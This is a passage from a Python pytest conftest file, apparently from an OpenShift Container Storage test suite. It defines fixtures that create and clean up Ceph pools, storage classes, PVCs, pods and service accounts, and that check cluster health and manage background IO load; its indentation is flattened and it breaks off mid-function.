* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
                    are not used, but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
then the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
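# Editor's note: a minimal, hypothetical usage sketch for the factory fixture above.
# A test requests 'storageclass_factory' and calls it to get a ready storage class;
# secret/pool creation and teardown are handled by the fixture, e.g.:
#
#     def test_example(storageclass_factory):
#         sc = storageclass_factory(interface=constants.CEPHFILESYSTEM)
#         assert sc.name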
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
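# Editor's note: a hypothetical usage sketch for the PVC factory above. The factory
# reuses a single project per test unless 'project' is passed, and falls back to the
# default storage class for the interface unless 'storageclass' is provided, e.g.:
#
#     def test_example(pvc_factory, storageclass_factory):
#         sc = storageclass_factory(interface=constants.CEPHBLOCKPOOL)
#         pvc_obj = pvc_factory(storageclass=sc, size=5,
#                               access_mode=constants.ACCESS_MODE_RWO)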
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (str): True if pod with raw block pvc
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if not (teardown or skip_ocs_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = (
True if ("deployment" in request.node.items[0].location[0]) else False
)
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
            Print the cluster utilization metrics every 20 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
    set of new PVCs. Options for PVC creation based on provided access modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
                Values are 'select_random', 'distribute_random' and
                'distribute_sequential'.
                'select_random' : While creating each PVC, one access mode will
                    be selected from the 'access_modes' list.
                'distribute_random' : The access modes in the list
                    'access_modes' will be distributed based on the values in
                    'access_mode_dist_ratio' and the order in which PVCs are
                    created will not be based on the access modes. For example,
                    the 1st and 6th PVC might have the same access mode.
                'distribute_sequential' : The access modes in the list
                    'access_modes' will be distributed based on the values in
                    'access_mode_dist_ratio' and the PVCs will be created as
                    sets of PVCs with the same access mode. For example, the
                    first set of 10 PVCs will have the same access mode,
                    followed by the next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
